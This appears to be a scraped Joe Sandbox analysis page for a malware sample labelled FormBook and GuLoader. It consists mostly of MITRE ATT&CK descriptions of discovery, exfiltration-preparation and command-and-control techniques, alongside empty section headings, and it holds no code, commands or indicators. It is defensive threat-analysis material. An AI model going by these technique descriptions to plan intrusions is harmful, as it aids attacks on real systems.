Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report os9TZxfmTZ.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre